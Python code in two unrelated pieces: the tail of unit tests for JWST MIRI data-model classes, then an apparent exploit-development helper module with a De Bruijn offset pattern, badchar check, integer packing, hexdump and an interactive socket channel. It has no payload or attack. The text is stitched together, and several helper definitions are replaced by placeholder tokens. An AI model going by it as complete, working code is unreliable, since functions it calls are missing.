self.simpleproduct.save(self.testfile_ascii, overwrite=True)\n# with MiriMeasuredModel(self.testfile_ascii) as readback:\n# self.assertTrue( np.allclose(self.simpleproduct.data,\n# readback.data) )\n# del readback\n\n def test_masking(self):\n # The DQ array must mask off bad values in the SCI and ERR arrays.\n a2 = [[10,999,10,999], [999,10,10,999], [10,10,999,10]]\n b2 = [[1,99,1,99], [99,1,1,99], [1,1,99,1]]\n c2 = [[0,1,0,1], [1,0,0,1], [0,0,1,0]]\n\n # Without a DQ array (assuming the default quality value is 0)\n # the SCI and ERR arrays are not masked, so their averages\n # include the 999s and are greater than they ought to be.\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n \n # The addition of the quality data should cause the SCI and ERR\n # arrays to be masked off and give the correct average.\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n \n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]\n b2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\n c2 = [[0,1,1,0],[0,2,0,2],[1,0,1,0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n \n # Self-subtraction of the simple product. The result\n # should be zero.\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n \n # Scalar addition\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product addition\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test that error arrays are combined properly - at least for\n # a couple of unmasked points.\n expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]\n actualsq = result.err[1,0]*result.err[1,0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]\n actualsq = result.err[2,1]*result.err[2,1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n \n # Scalar subtraction\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product subtraction\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test that error arrays are combined properly - at least for\n # a couple of unmasked points.\n expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]\n actualsq = result.err[1,0]*result.err[1,0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]\n actualsq = result.err[2,1]*result.err[2,1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n \n # Addition and subtraction should cancel each other out\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n \n # Scalar multiplication\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n\n # Data product multiplication\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1)\n self.assertTrue(np.array_equal(expectedErr, result.err))\n \n del result, da1, da2, err1, err2, expectedErr\n\n # Scalar division\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n \n # Division by zero\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n\n # Data product division\n #print(\"NOTE: The following test is expected to generate run time warnings.\")\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n # Test Juergen Schreiber error propagation\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt( dpErr * dpErr/(newdat * newdat) + \\\n newdpErr * newdpErr * dat * dat / \\\n (newdat * newdat * newdat * newdat)) \n \n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n \n # More complex arithmetic should be possible.\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = ((self.dataproduct - newdp) * newdp2 / newdp3) + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n\n def test_broadcasting(self):\n # Test that operations where the broadcasting of one array\n # onto a similar shaped array work.\n a4x3 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]\n b4x3 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\n #c4x3 = [[0,1,0,0],[0,0,1,0],[1,0,0,1]]\n \n a4x1 = [4,3,2,1]\n b4x1 = [1,2,1,2]\n c4x1 = [0,1,0,0]\n \n #a5x1 = [5,4,3,2,1]\n #b5x1 = [1,2,3,2,1]\n c5x1 = [0,1,0,0,1]\n \n # Create an object with 4x3 primary and error arrays but a 4x1\n # quality array. This should succeed because the quality array\n # is broadcastable.\n newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)\n self.assertTrue( np.allclose(a4x3, newdp1.data) )\n self.assertTrue( np.allclose(b4x3, newdp1.err) )\n self.assertTrue( np.allclose(c4x1, newdp1.dq) )\n\n # 5x1 is not broadcastable onto 4x3 and this statement should fail.\n # NOTE: Unfortunately this test also issues a warning message,\n # \"'MiriMeasuredModel' object has no attribute '_real_cls'\".\n # Turning off warnings does not stop this message from appearing.\n self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3,\n error=b4x3, quality=c5x1)\n \n # Combine two broadcastable object mathematically.\n # The + and - operations should be commutative and the result\n # should be saveable to a FITS file.\n newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)\n \n result1 = newdp1 + newdp2\n result2 = newdp2 + newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.data, result2.data) )\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n result1 = newdp1 * newdp2\n result2 = newdp2 * newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.data, result2.data) )\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n # The - and / operations are not commutative, but the data shape\n # should be consistent and the quality arrays should be combined\n # in the same way.\n result1 = newdp1 - newdp2\n result2 = newdp2 - newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue( np.allclose(result1.err, result2.err) )\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n result1 = newdp1 / newdp2\n result2 = newdp2 / newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n # The errors resulting from division depend on the order\n # of the operation.\n self.assertTrue( np.allclose(result1.dq, result2.dq) )\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n def test_description(self):\n # Test that the querying and description functions work.\n # For the test to pass these need to run without error\n # and generate non-null strings.\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI, ERROR and DQ arrays through attributes.\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n \n # Most of the necessary tests are already carried out by\n # the TestMiriMeasuredModel class.\n\n def setUp(self):\n # Create a ramp data product.\n # NOTE: A ramp product does not contain an ERR array.\n self.a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n self.c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.c2 = [[0,1,1,0], [1,0,0,1], [1,0,1,0]]\n self.acube = [self.a1,self.a1,self.a1]\n self.ccube = [self.c1,self.c2,self.c1]\n self.ahyper = [self.acube,self.acube]\n self.chyper = [self.ccube,self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.refout,\n pixeldq=self.c1,\n dq_def=pixeldq_flags,\n groupdq=self.chyper,\n groupdq_def=groupdq_flags)\n # Add some example metadata.\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST',\n nints=1, ngroups=1,\n frame_time=1.0,\n integration_time=10.0,\n group_time=10.0,\n reset_time=0, frame_resets=3)\n self.testfile = \"MiriRampModel_test.fits\"\n \n def tearDown(self):\n # Tidy up\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n # Remove temporary file, if able to.\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = \"Could not remove temporary file, \" + self.testfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n\n def test_creation(self):\n # Test that any of the quality arrays are optional.\n b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n bcube = [b1,b1,b1]\n bhyper = [bcube,bcube]\n \n # 1) Data array only. Data array must exist and be non-empty.\n # The quality arrays must be 2-D and 4-D.\n # Unspecified arrays must be filled with default values. \n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n # Assumes default is 0.0 - see schema\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n # Assumes default is 0 - see schema\n # FIXME: The pixeldq array ends up containing null values.\n #self.assertEqual(np.mean(newdp1.pixeldq), 0)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n\n # 2) Data and both quality arrays. All arrays must exist,\n # be non-empty and be the shape specified.\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n # The pixeldq array must not be full of default values.\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n # The groupdq array must not be full of default values.\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n\n # 3) Data and pixeldq array only. All arrays must exist,\n # be non-empty and be the shape specified.\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n # The pixeldq array must not be full of default values.\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n\n # 4) Data and groupdq array only. All arrays must exist,\n # be non-empty and be the shape specified.\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n # The groupdq array must not be full of default values.\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n # The groupdq array must not be full of default values.\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n\n # It should be possible to set up an empty data product with\n # a specified 4-D shape. Data array should be\n # initialised to the same shape.\n emptydp = MiriRampModel( (2,2,2,2) )\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2,2,2,2))\n self.assertIsNotNone(emptydp.pixeldq)\n #self.assertEqual(emptydp.pixeldq.shape, (2,2))\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2,2,2,2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n \n # A null data product can also be created and populated\n # with data later.\n nulldp = MiriRampModel( )\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n \n # Creating an object with other than 4 dimensions must fail.\n a1d = [10,20,30,40]\n c1d = [1,0,0,0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n\n a2d = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n c2d = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n\n # The pixeldq array must be 2-D.\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n # The groupdq array must be 4-D.\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n # Ramp data must have a dq array which gives a view of one\n # or both of the pixeldq and groupdq masks\n self.assertIsNotNone(self.dataproduct.dq)\n\n # Create a data product masked by the pixeldq array.\n # The dq and pixeldq arrays must be the same\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all( mask1.dq == mask1.pixeldq ))\n del mask1\n\n # Create a data product masked by the groupdq array.\n # The dq and groupdq arrays must be the same\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all( mask2.dq == mask2.groupdq ))\n del mask2\n\n # Create a data product masked by both pixeldq and groupdq arrays.\n # The result must have the same shape as the groupdq array but be\n # a combination of both masks.\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all( mask3.dq == expected ))\n del mask3\n\n def test_arithmetic(self):\n # The ramp data model supports all the arithmetic operations\n # supported by the MiriMeasuredModel. The following are exceptions\n # specific to the ramp model.\n \n # Create a data model in which the DATA and DQ arrays have different\n # shapes.\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1,\n groupdq=self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n \n # Suppress warning about the DQ array being propagated only from GROUPDQ\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check the product can be combined with itself\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all( (double.data - expected) < 0.001 ))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n \n # When this is combined with another data product, the DATA\n # array is masked with both the pixeldq and groupdq arrays.\n warnings.simplefilter(\"ignore\")\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n \n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check that the data product can be written to a FITS\n # file and read back again without changing the data.\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq','groupdq'],\n tables=['pixeldq_def', 'groupdq_def'] )\n del readback\n \n def test_description(self):\n # Test that the querying and description functions work.\n # For the test to pass these need to run without error\n # and generate non-null strings.\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI, REFOUR and DQ arrays through attributes.\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n \n # Most of the necessary tests are already carried out by\n # the TestMiriMeasuredModel class.\n\n def setUp(self):\n # Create a slope data product.\n a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n acube = [a1,a1,a1]\n bcube = [b1,b1,b1]\n ccube = [c1,c1,c1]\n dcube = [a1,b1,a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube,\n dq=ccube, dq_def=master_flags,\n zeropt=dcube, fiterr=dcube)\n # Add some example metadata.\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F2550W',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW',\n nints=3, ngroups=10,\n frame_time=1.0,\n integration_time=100.0,\n group_time=1000.0,\n reset_time=0, frame_resets=3)\n self.testfile = \"MiriSlopeModel_test.fits\"\n \n def tearDown(self):\n # Tidy up\n del self.dataproduct\n # Remove temporary file, if able to.\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = \"Could not remove temporary file, \" + self.testfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n\n def test_creation(self):\n # Creating an object with other than 3 dimensions must fail.\n a1d = [10,20,30,40]\n b1d = [1,2,3,4]\n c1d = [1,0,0,0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d,\n dq=c1d)\n\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d,\n dq=c2d)\n\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d,\n dq=c4d)\n\n def test_copy(self):\n # Test that a copy can be made of the data product.\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal( self, self.dataproduct, datacopy,\n arrays=['data', 'err', 'dq',\n 'nreads', 'readsat', 'ngoodseg',\n 'zeropt', 'fiterr'],\n tables='dq_def' )\n del datacopy\n\n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n # Check that the data product can be written to a FITS\n # file and read back again without changing the data.\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq',\n 'nreads', 'readsat', 'ngoodseg',\n 'zeropt', 'fiterr'],\n tables='dq_def' )\n del readback\n \n def test_description(self):\n # Test that the querying and description functions work.\n # For this test to pass these only need to run without error.\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n \n # Attempt to access the SCI and DQ arrays through attributes.\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n# If being run as a main program, run the tests.\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
19,
23,
27,
28,
31
]
}
|
[
19,
23,
27,
28,
31
] |
<|reserved_special_token_0|>
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
<|reserved_special_token_0|>
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
<|reserved_special_token_0|>
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert all(b not in data for b in badchars)
<|reserved_special_token_0|>
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return (b in
b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
)
lines = []
chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for
b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,
right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\x1b['
ESCAPE_END = 'm'
<|reserved_special_token_0|>
class DisconnectException(Exception):
pass
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception('Pattern length is way to large')
def _generate(self, n):
"""Generate a De Bruijn sequence."""
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx + len(needle):].find(needle) != -1:
raise ValueError('Multiple occurances found!')
return idx
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i + 1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
if end - start >= Y + 2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
buf = ''
last = None
for tag, value in parts:
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException('Server disconnected.')
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024)
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
